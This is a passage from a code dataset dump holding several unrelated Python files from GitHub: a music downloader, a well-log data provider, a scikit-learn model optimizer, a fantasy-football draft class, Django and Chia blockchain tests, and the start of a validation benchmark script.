self.source)\n size = colorize(\"%5sMB\" % self.size, \"yellow\")\n title = colorize(self.title, \"yellow\")\n v = colorize(\" | \", self.source)\n h = colorize(\" - \", self.source)\n return (\n idx\n + source\n + v\n + self.duration\n + h\n + size\n + h\n + self.singer\n + h\n + title\n + h\n + self.album\n )\n\n @property\n def row(self):\n \"\"\" 歌曲摘要信息,列出搜索歌曲时使用PrettyTable \"\"\"\n keywords = re.split(\";|,|\\s|\\*\", config.get(\"keyword\"))\n\n def highlight(s, k):\n return s.replace(k, colorize(k, \"xiami\")).replace(\n k.title(), colorize(k.title(), \"xiami\")\n )\n\n ht_singer = self.singer if len(self.singer) < 30 else self.singer[:30] + \"...\"\n ht_title = self.title if len(self.title) < 30 else self.title[:30] + \"...\"\n ht_album = self.album if len(self.album) < 20 else self.album[:20] + \"...\"\n for k in keywords:\n if not k:\n continue\n ht_singer = highlight(ht_singer, k)\n ht_title = highlight(ht_title, k)\n ht_album = highlight(ht_album, k)\n\n size = \"%sMB\" % self.size\n ht_size = size if int(self.size) < 8 else colorize(size, \"flac\")\n\n return [\n colorize(self.idx, \"baidu\"),\n ht_title,\n ht_singer,\n ht_size,\n self.duration,\n ht_album,\n self.source.upper(),\n ]\n\n @property\n def url(self):\n return self._url\n\n @url.setter\n def url(self, url):\n \"\"\" 设置URL的时候同时更新size大小 \"\"\"\n try:\n r = requests.get(\n url,\n stream=True,\n headers=config.get(\"wget_headers\"),\n 
proxies=config.get(\"proxies\"),\n )\n self._url = url\n size = int(r.headers.get(\"Content-Length\", 0))\n # 转换成MB并保留两位小数\n self.size = round(size / 1048576, 2)\n except Exception as e:\n self.logger.info(_(\"请求失败: {url}\").format(url=url))\n self.logger.info(e)\n\n @property\n def fullname(self):\n \"\"\" 唯一有效的完整路径,如果冲突则在名称加数字,如music(1).mp3 \"\"\"\n outfile = os.path.abspath(os.path.join(self.outdir, self.name))\n if os.path.exists(outfile):\n name, ext = self.name.rsplit(\".\", 1)\n names = [x for x in os.listdir(self.outdir) if x.startswith(name)]\n names = [x.rsplit(\".\", 1)[0] for x in names]\n suffixes = [x.replace(name, \"\") for x in names]\n # filter suffixes that match ' (x)' pattern\n suffixes = [\n x[2:-1] for x in suffixes if x.startswith(\" (\") and x.endswith(\")\")\n ]\n indexes = [int(x) for x in suffixes if set(x) <= set(\"0123456789\")]\n idx = 1\n if indexes:\n idx += sorted(indexes)[-1]\n outfile = os.path.abspath(\n os.path.join(self.outdir, \"%s (%d).%s\" % (name, idx, ext))\n )\n return outfile\n\n def download(self):\n \"\"\" 下载音乐 \"\"\"\n if config.get(\"verbose\"):\n click.echo(str(self))\n else:\n click.echo(self.info)\n\n music_file = self.fullname.replace(\"?\", \"\")\n self._download_file(self.url, music_file, stream=True)\n\n if config.get(\"lyrics\") and self.lyrics:\n lyrics_file = (\n music_file.rpartition(\".\")[0] + \".\" + self.lyrics.rpartition(\".\")[-1]\n )\n self._download_file(self.lyrics, lyrics_file)\n\n if config.get(\"picture\") and self.cover:\n cover_file = music_file.rpartition(\".\")[0] + \".jpg\"\n self._download_file(self.cover, cover_file)\n\n click.echo(\"-------------\\n\")\n\n def _download_file(self, url, outfile, stream=False):\n \"\"\"\n 下载文件用的辅助函数\n :param url: 下载地址\n :param outfile: 含完整���径的文件名\n :param stream: 是否需要进度条\n :return:\n \"\"\"\n try:\n r = requests.get(\n url,\n stream=stream,\n headers=config.get(\"wget_headers\"),\n proxies=config.get(\"proxies\"),\n )\n if stream:\n total_size = int(r.headers[\"content-length\"])\n with click.progressbar(length=total_size, label=_(\"下载中...\")) as bar:\n with open(outfile, \"wb\") as f:\n for chunk in r.iter_content(chunk_size=1024):\n if chunk:\n f.write(chunk)\n bar.update(len(chunk))\n else:\n with open(outfile, \"wb\") as f:\n f.write(r.content)\n click.echo(_(\"已保存到: {outfile}\").format(outfile=outfile))\n except Exception as e:\n click.echo(\"\")\n self.logger.error(_(\"下载失败: \") + \"\\n\")\n self.logger.error(_(\"URL: {url}\").format(url=self.url) + \"\\n\")\n self.logger.error(_(\"位置: {outfile}\").format(outfile=outfile) + \"\\n\")\n if self.verbose:\n self.logger.error(e)\n","repo_name":"lszxiao/mymusic","sub_path":"music_dl/music.py","file_name":"music.py","file_ext":"py","file_size_in_byte":8020,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"913014707","text":"import copy\nimport numpy as np\n\n\n# TODO: try to generalize using __getattribute__\n# TODO: caching\nclass DataProvider:\n def __init__(self, lasfile):\n self.lasfile = lasfile\n\n def _find_well_log(self, data):\n if \"mnemonic\" in data:\n mnemonic = data.pop(\"mnemonic\")\n else:\n mnemonic = \"\"\n \n for index, log in enumerate(self.lasfile[\"curve\"]):\n log[\"mnemonic\"]\n if log[\"mnemonic\"] == mnemonic:\n log[\"data\"] = self.lasfile[\"data\"][index]\n well_log = log\n break\n else:\n well_log = False\n\n return well_log\n\n def _get_well_log_label(self, data):\n data = copy.deepcopy(data)\n well_log = self._find_well_log(data[\"x\"])\n\n if not well_log:\n msg = f\"No well logs found for query: {data}\"\n raise ValueError(msg)\n else:\n if well_log[\"unit\"]:\n label = f\"{well_log['mnemonic']} ({well_log['unit']})\"\n else:\n label = well_log[\"mnemonic\"]\n \n return label\n\n def get_label(self, data):\n data = copy.deepcopy(data)\n source = data.pop(\"source\", \"well_log\")\n method = getattr(self, f\"_get_{source}_label\", None)\n if method is None:\n raise NotImplementedError(f\"DataProvider._get_{source}_label\")\n label = method(data)\n return label\n\n # TODO: generalize (all get_* look the same)\n def get_range(self, data):\n data = copy.deepcopy(data)\n source = data.pop(\"source\", \"well_logs\")\n method = getattr(self, f\"_get_{source}_range\", None)\n if method is None:\n raise NotImplementedError(f\"DataProvider._get_{source}_range\")\n rng = method(data)\n return rng\n\n def get_line(self, data):\n data = copy.deepcopy(data)\n source = data.pop(\"source\", \"well_logs\")\n method = getattr(self, f\"_get_{source}_line\", None)\n if method is None:\n raise NotImplementedError(f\"DataProvider._get_{source}_line\")\n rng = method(data)\n return rng\n\n def get_marker(self, data):\n print(f\"DataProvider.get_marker\\n{data}\\n\")\n raise NotImplementedError(\"DataProvider.get_marker\")\n\n def get_text(self, data):\n print(f\"DataProvider.get_text\\n{data}\\n\")\n raise NotImplementedError(\"DataProvider.get_text\")\n\n def _get_well_log_data(self, data):\n d = {}\n for k, v in data.items():\n # TODO: process multiples\n well_log = self._find_well_log(v)\n if not well_log:\n msg = f\"Well log not found for query {data}\"\n raise ValueError(msg)\n d[k] = well_log\n\n return d\n\n def _get_well_logs_range(self, data):\n well_log = self._find_well_logs(data)\n if not well_log:\n msg = f\"Well log not found for query {data}\"\n raise ValueError(msg)\n else:\n npdata = well_log[\"data\"]\n value_range = [\n np.nanmin(npdata),\n np.nanmax(npdata),\n ]\n\n return value_range\n\n # def _get_well_logs_line(self, data):\n # if \"alias\" in data:\n # alias = data[\"alias\"]\n # prop, _ = self.datamanager.get_property_from_mnem(alias)\n # else:\n # well_logs = self._find_well_logs(data)\n # if not well_logs:\n # msg = f\"Well log not found for query {data}\"\n # raise ValueError(msg)\n # prop = well_logs[0].property\n\n # line_prop = prop.default_line_property\n # if line_prop is None:\n # line = {\"color\": \"k\"}\n # else:\n # line = {}\n # line[\"color\"] = line_prop.color\n # line[\"width\"] = line_prop.width\n # line[\"style\"] = line_prop.style\n # line[\"alpha\"] = line_prop.alpha\n # line = {k: v for k, v in line.items() if v is not None}\n\n # return line\n\n def get_data(self, data):\n data = copy.deepcopy(data)\n source = data.pop(\"source\", \"well_logs\")\n method = getattr(self, f\"_get_{source}_data\", None)\n if method is 
None:\n raise NotImplementedError(f\"DataProvider._get_{source}_data\")\n return method(data)\n","repo_name":"giecaruff/LAS2Plot","sub_path":"data_provider.py","file_name":"data_provider.py","file_ext":"py","file_size_in_byte":4340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"38127825090","text":"################################################\n##### Superconductivity Optimizer Notebook #####\n################################################\n# Trains models to predict critical temperatures based on features found with \"*../code/get_featurizers.ipynb*\". \n# Imports data from \"*../data/supercon_feat.csv*\", which is produced in *get_featurizers.ipynb*. The orginal data is from the supercon database. \n# Compute-Farm version\n# Author: Sylphrena Kleinsasser\n################################################\n\n######################################################\n### Import Libraries / Define Import Data Function ###\n######################################################\n# %% \n#general imports:\n# import warnings #to suppress grid search warnings\nimport time\nimport argparse\nimport warnings\nimport numpy as np \nimport pandas as pd\nimport matplotlib.pyplot as plt\n# import seaborn as sns #heatmaps\n\n#regression models:\n# from mlens.ensemble import SuperLearner\nfrom sklearn.neighbors import KNeighborsRegressor\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.ensemble import AdaBoostRegressor, BaggingRegressor, ExtraTreesRegressor, RandomForestRegressor\nfrom sklearn.linear_model import LinearRegression, LogisticRegression, Ridge, Lasso, ElasticNet, SGDRegressor, BayesianRidge\nfrom sklearn.svm import SVR\n\n#various ML tools:\nfrom sklearn.pipeline import make_pipeline, Pipeline\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder, StandardScaler\nfrom sklearn.model_selection import train_test_split, GridSearchCV, KFold, cross_val_predict, cross_val_score\nfrom sklearn.metrics import accuracy_score, recall_score, r2_score, mean_absolute_error, mean_squared_error\n# from skopt import BayesSearchCV #bayesian optimization\n\n#imports custom libraries (shared functions)\nimport dependancies.shared_functions as sfn\n\n###################################################\n######## Define and Validate CLI Arguments ########\n###################################################\n# %% \nsfn.syncdir() #ensures working directory is inside code on compute farm\n\nparser = argparse.ArgumentParser(description=\"A program that optimizes regression models for predicting superconductor critical temperatures.\")\nparser.add_argument('-s', '--samplesize', action='store', dest='limit', default=1000, help='Limit the GridSearch Data Sample Size. Value must be \\'all\\' or a number between 0 and 16414')\nparser.add_argument('-a', '--all', action='store_true', dest='all', help='Boolean option to enable all regression models. 
Overrides individual toggles.')\nparser.add_argument('-sv', '--svr', action='store_true', dest='SVR', help='Boolean option to enable the Support Vector Machines (Linear) model.')\nparser.add_argument('-svp', '--svrpoly', action='store_true', dest='SVR_POLY', help='Boolean option to enable the Support Vector Machines (Poly) model.')\nparser.add_argument('-el', '--elastic', action='store_true', dest='ELASTIC', help='Boolean option to enable the Elastic Net Regression model.')\nparser.add_argument('-dt', '--decisiontree', action='store_true', dest='DT', help='Boolean option to enable the Decision Tree Regression model.')\nparser.add_argument('-rf', '--randomforest', action='store_true', dest='RFR', help='Boolean option to enable the Random Forest Regression model.')\nparser.add_argument('-knn', '--knn', action='store_true', dest='KNN', help='Boolean option to enable the KNeighbors Regression model.')\nparser.add_argument('-et', '--extratrees', action='store_true', dest='TREES', help='Boolean option to enable the Extra Trees Regression model.')\nparser.add_argument('-sgd', '--stochastic', action='store_true', dest='SGD', help='Boolean option to enable the Stochastic Gradient Descent model.')\nparser.add_argument('-by', '--bayes', action='store_true', dest='BAYES', help='Boolean option to enable the Bayesian Regression model.')\n\nargs = parser.parse_args()\n\nlimit = args.limit\nif str(limit) == 'all':  # check 'all' before int() so the documented 'all' value does not raise\n    limit = 16414\nelif 0 < int(limit) < 16414:\n    pass\nelse:\n    raise Exception(\"Invalid GridSearch Data Sample Size Limit. Value must be 'all' or a number between 0 and 16414.\") #i am once again asking for a valid input :(\n\n#####################################################\n########### Setup Models for GridSearchCV ###########\n#####################################################\n# %% \n\nsfn.import_data(replace_inf=False) #grab data\n\n#drop data that will not be used for optimization after shuffle, to limit defined in function\nlimit = int(limit)\ntrain_data = sfn.train_data.iloc[:limit]\ntest_data = sfn.test_data.iloc[:limit]\ntrain_target = sfn.train_target.iloc[:limit]\ntest_target = sfn.test_target.iloc[:limit]\n\n#get number of rows and columns for use in parameters\nn_features = sfn.data.shape[1]\nn_samples = sfn.data.shape[0]\n\n#define parameters that will be searched with GridSearchCV\nSVR_PARAMETERS = {\"kernel\": [\"poly\",\"rbf\",\"sigmoid\"], \"degree\": np.arange(1,10,2), \"C\": np.linspace(0,1000,5), \"epsilon\": np.logspace(-3, 3, 5),\n                  \"gamma\": [1.00000000e-03, 5.99484250e-02, 4.64158883e-01, 3.59381366e+00, 1.00000000e+01, \"scale\", \"auto\"]}\nSVR_POLY_PARAMETERS = {\"C\": np.linspace(0,1000,5), \"epsilon\": np.logspace(-3, 3, 5), \n                       \"gamma\": [1.00000000e-03, 5.99484250e-02, 4.64158883e-01, 3.59381366e+00, 1.00000000e+01, \"scale\", \"auto\"]}\nELASTIC_PARAMETERS = {\"alpha\": np.logspace(-10, 2, 5), 'l1_ratio': np.arange(0, 1, 0.1)}\nDT_PARAMETERS = {'criterion': ['squared_error', 'friedman_mse', 'absolute_error', 'poisson'], 'max_depth': [None, 1, 3, 5, 7], \n                 'max_features': [None, 'sqrt', 'log2', 0.3, 0.5, 0.7, n_features//2, n_features//3, ],\n                 'min_samples_split': [3, 2, 0.3, 0.5, n_samples//2, n_samples//3, n_samples//5], \n                 'min_samples_leaf':[1, 0.3, 0.5, n_samples//2, n_samples//3, n_samples//5]}\nRFR_PARAMETERS = {'max_features': ['auto', 1, 2, 3, 4, 5], 'n_estimators': np.linspace(1,1000,20,dtype=int)}\nKNN_PARAMETERS = {'n_neighbors': np.linspace(1,15,5,dtype=int), 'algorithm': ['auto', 'ball_tree', 'kd_tree', 'brute'], \n                  'metric':['euclidean', 'manhattan']}\nTREES_PARAMETERS = {'n_estimators': np.linspace(1,750,15,dtype=int)} \nSGD_PARAMETERS = {'loss': ['squared_error', 'huber', 'epsilon_insensitive', 'squared_epsilon_insensitive'], #SGDRegressor only accepts regression losses\n                  'penalty': ['l1', 'l2', 'elasticnet'], \"alpha\": np.logspace(-4, 5, 5)}\nBAYES_PARAMETERS = {'alpha_init':[1, 1.1, 1.2, 1.3, 1.4, 1.5, 1.9], 'lambda_init': [1e-1, 1e-2, 1e-3, 1e-4, 1e-5, 1e-6, 1e-9]}\n\nmodels = [[(args.SVR, args.all), \"Support Vector Machines (Linear)\", SVR, SVR_PARAMETERS, {'max_iter': -1}],\n          [(args.SVR_POLY, args.all), \"Support Vector Machines (Poly)\", SVR, SVR_POLY_PARAMETERS, {'max_iter': -1}],\n          [(args.ELASTIC, args.all), \"Elastic Net Regression\", ElasticNet, ELASTIC_PARAMETERS, {'fit_intercept': True}],\n          [(args.DT, args.all), \"Decision Tree Regression\", DecisionTreeRegressor, DT_PARAMETERS, {'random_state': 43}],\n          [(args.RFR, args.all), \"Random Forest Regression\", RandomForestRegressor, RFR_PARAMETERS, {'bootstrap': True, 'n_jobs': -1}],\n          [(args.KNN, args.all), \"KNeighbors Regression\", KNeighborsRegressor, KNN_PARAMETERS, {'n_jobs': -1}],\n          [(args.TREES, args.all), \"Extra Trees Regression\", ExtraTreesRegressor, TREES_PARAMETERS, {'n_jobs': -1}],\n          [(args.SGD, args.all), \"Stochastic Gradient Descent\", SGDRegressor, SGD_PARAMETERS, {'fit_intercept': True, 'max_iter': 1500}],\n          [(args.BAYES, args.all), \"Bayesian Regression\", BayesianRidge, BAYES_PARAMETERS, {'fit_intercept': True}]]\n\ndef optimize_model(model_name, regressor, parameters, fixed_params): #performs grid search on a given model with specified search and fixed model parameters and saves results to csv\n    global results #variables that we want to define globally (outside of this function)\n    #this function will allow us to use multiprocessing to do multiple grid searches at once.\n    try: #try-excepts handles errors without ending process and allows us to read the error later on\n        start_time = time.time() #sets start time for function so we can record processing time\n        #define model, do grid search\n        search = GridSearchCV(regressor(**fixed_params), #model\n                    param_grid = parameters, #hyperparameters\n                    scoring = 'r2', #metrics for scoring\n                    return_train_score = False, #we want test score\n                    cv = 3, #number of folds\n                    n_jobs = -1, #amount of threads to use\n                    # refit = 'r2', #metric we are optimizing (no need to set for single metric scoring)\n                    verbose = 1) #how much output to send while running\n\n        search.fit(train_data, train_target) #fit the models\n        return (model_name, search.best_estimator_, search.best_params_, \"Best Score: \" + str(search.best_score_), \"Time Elapsed: \" + str(time.time() - start_time)) #record results\n    except Exception as error: #catch any issues and record them\n        return (model_name, \"ERROR\", \"ERROR\", error) #record errors\n\n####################################################\n#################### Run Search ####################\n####################################################\n# %% \n\nresults = []\nwarnings.filterwarnings('ignore') #got tired of non-converging errors\nfor [enabled, model_name, regressor, parameters, fixed_params] in models: #optimize enabled models\n    if True in enabled:\n        print(\"Starting GridSearchCV on {}\".format(model_name))\n        results.append(optimize_model(model_name, regressor, parameters, fixed_params))\n    else:\n        print(f\"Skipping {model_name} as it is not enabled.\")\n\nresult_df = pd.DataFrame(results)\nresult_df.to_csv('../data/optimization/optimize_gridsearch.csv', index=False) #saves results to '../data/optimization/optimize_gridsearch.csv'\n","repo_name":"sylphrena0/classe","sub_path":"code/model_optimizer.py","file_name":"model_optimizer.py","file_ext":"py","file_size_in_byte":10001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"34985870209","text":"\"\"\"Representation of a fantasy football draft.\"\"\"\nfrom src.model.general.phys_representations import Player, Team\nfrom src.model.general.settings import LeagueSettings\n\n\nclass Draft:\n \"\"\"Representation of a draft, with functions to modify the picks in the draft.\"\"\"\n\n def __init__(\n self,\n order: list[Team],\n rounds: int,\n player_pool: list[Player],\n settings: LeagueSettings,\n ) -> None:\n \"\"\"\n Create a draft, tracking the teams, available players, and settings of the league.\n\n :param order: List of teams participating in snake draft, sorted by the order they pick in round 1\n :param rounds: Number of rounds in draft\n :param player_pool: Players available to pick from in the draft\n :param settings: Settings of the league the draft is occurring in\n \"\"\"\n self._order: list[Team] = order\n self._rounds: int = rounds\n self._picks: list[Player] = []\n self._undrafted: list[Player] = player_pool\n self._settings: LeagueSettings = settings\n\n def set_pick(self, player: Player, pick_num: int | None = None) -> None:\n \"\"\"\n Set the xth pick of the draft (starting at 1) as the given player.\n\n :param player: Player who was drafted at given spot (or next spot)\n :param pick_num: If int, location in draft player was picked. If None, evaluates internally to next pick\n :raises ValueError: Pick number provided out of range (not a past pick or immediate next pick)\n :raises RuntimeError: Player unavailable to pick, can't add another pick\n \"\"\"\n if player not in self._undrafted:\n raise RuntimeError(f\"Player {player} not available to pick\")\n if (not pick_num) or (pick_num - 1 == len(self._picks)):\n # If adding next pick, remove player from undrafted and add to next pick's team\n if len(self._picks) == len(self._order) * self._rounds:\n raise RuntimeError(\"Can't add another pick. Draft already complete.\")\n self.pick_num_to_team(len(self._picks) + 1).roster.add_player(player)\n self._undrafted.remove(player)\n self._picks.append(player)\n elif (len(self._picks) < pick_num - 1) or (pick_num <= 0):\n raise ValueError(\n f\"Pick number {pick_num} is out of range. The next pick is pick {len(self._picks) + 1}\"\n )\n else:\n # If changing pick, remove player from team and add to player pool.\n self.pick_num_to_team(pick_num).roster.remove_player(player)\n self._undrafted.append(self._picks[pick_num - 1])\n # Then remove new player from player pool and to team\n self.pick_num_to_team(pick_num).roster.add_player(player)\n self._undrafted.remove(player)\n self._picks[pick_num - 1] = player\n\n def delete_picks(self, num_picks: int | None) -> None:\n \"\"\"\n Deletes the given numbers of picks from end of the draft\n\n :param num_picks: Number of picks to delete from end of draft. 
None to delete all picks.\n \"\"\"\n new_num_picks = num_picks if num_picks else len(self._picks)\n for pick in range(new_num_picks):\n self.pick_num_to_team(len(self._picks)).roster.remove_player(\n self._picks[-1]\n )\n self._undrafted.append(self._picks[-1])\n self._picks.pop()\n\n def pick_num_to_team(self, pick_num: int) -> Team:\n \"\"\"\n Convert a pick number to the team picking at that spot.\n\n :param pick_num: Pick number to convert (1-based)\n :raises ValueError: Pick number out of bounds of draft picks\n :return: Team picking at given pick number\n \"\"\"\n num_picks: int = len(self._order) * self._rounds\n if pick_num <= 0 or pick_num > num_picks:\n raise ValueError(f\"Pick number {pick_num} for draft with {num_picks} picks\")\n team_num = (pick_num - 1) % len(self._order)\n round = (pick_num - 1) // len(self._order) + 1\n if round % 2 == 0:\n team_num = len(self._order) - team_num - 1\n return self._order[team_num]\n","repo_name":"bf2799/ff_toolbox","sub_path":"src/model/general/draft.py","file_name":"draft.py","file_ext":"py","file_size_in_byte":4184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"31470785243","text":"import decimal\n\nfrom django.core.exceptions import ValidationError\nfrom django.utils.translation import gettext_lazy as _\nfrom finance_majordomo.stocks.models.transaction_models import Transaction\nfrom finance_majordomo.stocks.tests_transactions.setting import SettingsTransactions\n\n\nclass TransactionsModelsTest(SettingsTransactions):\n\n def test_models_params(self):\n self.assertEqual(self.transaction_id_1.ticker_id, 1)\n self.assertEqual(self.transaction_id_1.date, \"1999-12-31\")\n self.assertEqual(self.transaction_id_1.price, \"10\")\n self.assertEqual(self.transaction_id_1.fee, '0.00')\n self.assertEqual(Transaction.objects.count(), 7)\n self.assertEqual(\n self.transaction_id_5._meta.get_field('date').verbose_name,\n _(\"Transaction date\"))\n self.assertEqual(\n self.transaction_id_5._meta.get_field('quantity').verbose_name,\n _(\"Transaction quantity\"))\n self.assertEqual(\n self.transaction_id_5._meta.get_field('creation_date').verbose_name,\n _(\"Creation date\"))\n\n def test_price_validation_fail_1(self):\n price_invalid = \"not decimal\"\n\n with self.assertRaises(ValidationError):\n Transaction.objects.create(\n price=price_invalid,\n quantity=1,\n date='2020-03-02',\n ticker=self.stock_id_1,\n user=self.user_authenticated\n )\n\n def test_price_validation_fail_2(self):\n price_invalid = '100,10'\n\n with self.assertRaises(ValidationError):\n Transaction.objects.create(\n price=price_invalid,\n quantity=1,\n date='2020-03-02',\n ticker=self.stock_id_1,\n user=self.user_authenticated\n )\n\n # why InvalidOperation not ValidationError?\n def test_price_validation_fail_3(self):\n price_invalid = 123456789\n\n with self.assertRaises(decimal.InvalidOperation):\n Transaction.objects.create(\n price=price_invalid,\n quantity=1,\n date='2020-03-02',\n ticker=self.stock_id_1,\n user=self.user_authenticated\n )\n\n def test_date_validation_fail_1(self):\n date_invalid = '2020-02-30'\n\n with self.assertRaises(ValidationError):\n Transaction.objects.create(\n price='11',\n quantity=1,\n date=date_invalid,\n ticker=self.stock_id_1,\n user=self.user_authenticated\n )\n\n def test_date_validation_fail_2(self):\n date_invalid = '10-10-2020'\n\n with self.assertRaises(ValidationError):\n Transaction.objects.create(\n price='11',\n quantity=1,\n date=date_invalid,\n ticker=self.stock_id_1,\n user=self.user_authenticated\n )\n","repo_name":"Unshock/finance_majordomo","sub_path":"finance_majordomo/stocks/made tests/1test_models_trans.py","file_name":"1test_models_trans.py","file_ext":"py","file_size_in_byte":2973,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"27328556559","text":"import asyncio\nimport pytest\n\nfrom src.consensus.block_rewards import calculate_base_farmer_reward, calculate_pool_reward\nfrom src.consensus.blockchain import ReceiveBlockResult\nfrom src.protocols import full_node_protocol, wallet_protocol\nfrom src.protocols.protocol_message_types import ProtocolMessageTypes\nfrom src.simulator.full_node_simulator import FullNodeSimulator\nfrom src.simulator.simulator_protocol import FarmNewBlockProtocol\nfrom src.types.mempool_inclusion_status import MempoolInclusionStatus\nfrom src.types.peer_info import PeerInfo\nfrom src.util.errors import Err\nfrom src.util.ints import uint16, uint32\nfrom src.wallet.transaction_record import TransactionRecord\nfrom tests.core.full_node.test_full_node import add_dummy_connection\nfrom tests.setup_nodes import setup_simulators_and_wallets, self_hostname, bt\nfrom tests.time_out_assert import time_out_assert\n\n\n@pytest.fixture(scope=\"module\")\ndef event_loop():\n loop = asyncio.get_event_loop()\n yield loop\n\n\nclass TestTransactions:\n @pytest.fixture(scope=\"function\")\n async def wallet_node_30_freeze(self):\n async for _ in setup_simulators_and_wallets(1, 1, {\"INITIAL_FREEZE_PERIOD\": 30}):\n yield _\n\n @pytest.mark.asyncio\n async def test_transaction_freeze(self, wallet_node_30_freeze):\n num_blocks = 5\n full_nodes, wallets = wallet_node_30_freeze\n full_node_api: FullNodeSimulator = full_nodes[0]\n full_node_server = full_node_api.server\n wallet_node, server_2 = wallets[0]\n wallet = wallet_node.wallet_state_manager.main_wallet\n ph = await wallet.get_new_puzzlehash()\n\n incoming_queue, node_id = await add_dummy_connection(full_node_server, 12312)\n\n await server_2.start_client(PeerInfo(self_hostname, uint16(full_node_server._port)), None)\n for i in range(num_blocks):\n await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(ph))\n\n funds = sum(\n [calculate_pool_reward(uint32(i)) + calculate_base_farmer_reward(uint32(i)) for i in range(1, num_blocks)]\n )\n # funds += calculate_base_farmer_reward(0)\n await asyncio.sleep(2)\n print(await wallet.get_confirmed_balance(), funds)\n await time_out_assert(10, wallet.get_confirmed_balance, funds)\n\n tx: TransactionRecord = await wallet.generate_signed_transaction(100, ph, 0)\n spend = wallet_protocol.SendTransaction(tx.spend_bundle)\n response = await full_node_api.send_transaction(spend)\n assert wallet_protocol.TransactionAck.from_bytes(response.data).status == MempoolInclusionStatus.FAILED\n\n new_spend = full_node_protocol.NewTransaction(tx.spend_bundle.name(), 1, 0)\n response = await full_node_api.new_transaction(new_spend)\n assert response is None\n\n peer = full_node_server.all_connections[node_id]\n new_spend = full_node_protocol.RespondTransaction(tx.spend_bundle)\n response = await full_node_api.respond_transaction(new_spend, peer=peer)\n assert response is None\n\n for i in range(26):\n await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(ph))\n\n new_spend = full_node_protocol.NewTransaction(tx.spend_bundle.name(), 1, 0)\n response = await full_node_api.new_transaction(new_spend)\n assert response is not None\n assert ProtocolMessageTypes(response.type) == ProtocolMessageTypes.request_transaction\n\n tx: TransactionRecord = await wallet.generate_signed_transaction(100, ph, 0)\n spend = wallet_protocol.SendTransaction(tx.spend_bundle)\n response = await full_node_api.send_transaction(spend)\n assert response is not None\n assert 
wallet_protocol.TransactionAck.from_bytes(response.data).status == MempoolInclusionStatus.SUCCESS\n assert ProtocolMessageTypes(response.type) == ProtocolMessageTypes.transaction_ack\n\n @pytest.mark.asyncio\n async def test_invalid_block(self, wallet_node_30_freeze):\n num_blocks = 5\n full_nodes, wallets = wallet_node_30_freeze\n full_node_api: FullNodeSimulator = full_nodes[0]\n full_node_server = full_node_api.server\n wallet_node, server_2 = wallets[0]\n wallet = wallet_node.wallet_state_manager.main_wallet\n ph = await wallet.get_new_puzzlehash()\n\n await server_2.start_client(PeerInfo(self_hostname, uint16(full_node_server._port)), None)\n for i in range(num_blocks):\n await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(ph))\n\n funds = sum(\n [calculate_pool_reward(uint32(i)) + calculate_base_farmer_reward(uint32(i)) for i in range(1, num_blocks)]\n )\n # funds += calculate_base_farmer_reward(0)\n await asyncio.sleep(2)\n print(await wallet.get_confirmed_balance(), funds)\n await time_out_assert(10, wallet.get_confirmed_balance, funds)\n\n tx: TransactionRecord = await wallet.generate_signed_transaction(100, ph, 0)\n\n current_blocks = await full_node_api.get_all_full_blocks()\n new_blocks = bt.get_consecutive_blocks(\n 1, block_list_input=current_blocks, transaction_data=tx.spend_bundle, guarantee_transaction_block=True\n )\n last_block = new_blocks[-1:][0]\n\n new_blocks_no_tx = bt.get_consecutive_blocks(\n 1, block_list_input=current_blocks, guarantee_transaction_block=True\n )\n last_block_no_tx = new_blocks_no_tx[-1:][0]\n\n result, error, fork = await full_node_api.full_node.blockchain.receive_block(last_block, None)\n assert error is not None\n assert error is Err.INITIAL_TRANSACTION_FREEZE\n assert result is ReceiveBlockResult.INVALID_BLOCK\n\n result, error, fork = await full_node_api.full_node.blockchain.receive_block(last_block_no_tx, None)\n assert error is None\n assert result is ReceiveBlockResult.NEW_PEAK\n\n after_freeze_blocks = bt.get_consecutive_blocks(24, block_list_input=new_blocks_no_tx)\n for block in after_freeze_blocks:\n await full_node_api.full_node.blockchain.receive_block(block, None)\n\n assert full_node_api.full_node.blockchain.get_peak_height() == 30\n\n new_blocks = bt.get_consecutive_blocks(\n 1, block_list_input=after_freeze_blocks, transaction_data=tx.spend_bundle, guarantee_transaction_block=True\n )\n last_block = new_blocks[-1:][0]\n result, error, fork = await full_node_api.full_node.blockchain.receive_block(last_block, None)\n assert error is None\n assert result is ReceiveBlockResult.NEW_PEAK\n","repo_name":"LeastAuthority/Chia-Network-chia-blockchain","sub_path":"tests/core/full_node/test_initial_freeze.py","file_name":"test_initial_freeze.py","file_ext":"py","file_size_in_byte":6612,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"}
+{"seq_id":"16780563532","text":"\"\"\"\nbenchmark data validation librarys\n\nusage:\n\n python benchmark.py\n\nadd case:\n 1. create case_{CASE_NAME}.py\n 2. implement one or more funcs which can validate the `DATA` in this module\n 3. put validate funcs in a dict named `CASES` in case module\n\"\"\"\nimport json\nfrom profile import runctx\nfrom glob import glob\nfrom os.path import basename, dirname, splitext\nfrom timeit import Timer as BaseTimer\nfrom pprint import pprint as pp\n\nimport click\n\nDATA = {\n 'user': {'userid': 5},\n 'tags': [1, 2, 5, 9999, 1234567890],\n 'style': {\n 'width': 400,\n 'height': 400,\n 'border_width': 5,\n 'border_style': 'solid',\n 'border_color': 'red',\n 'color': 'black'\n },\n # \"optional\": \"string\"\n}\nTEXT = json.dumps(DATA)\n\n\ndef make_data():\n return json.loads(TEXT)\n\n\ndef glob_cases():\n files = glob(dirname(__file__) + '/case_*.py')\n cases = {}\n for filename in files:\n module = splitext(basename(filename))[0]\n name = module[len('case_'):]\n cases[name] = __import__(module).CASES\n return cases\n\n\nCASES = glob_cases()\n\n# support Timer.autorange which add in python 3.6\nif hasattr(BaseTimer, 'autorange'):\n Timer = BaseTimer\nelse:\n class Timer(BaseTimer):\n def autorange(self, callback=None):\n \"\"\"Return the number of loops and time taken so that total time >= 0.2.\n Calls the timeit 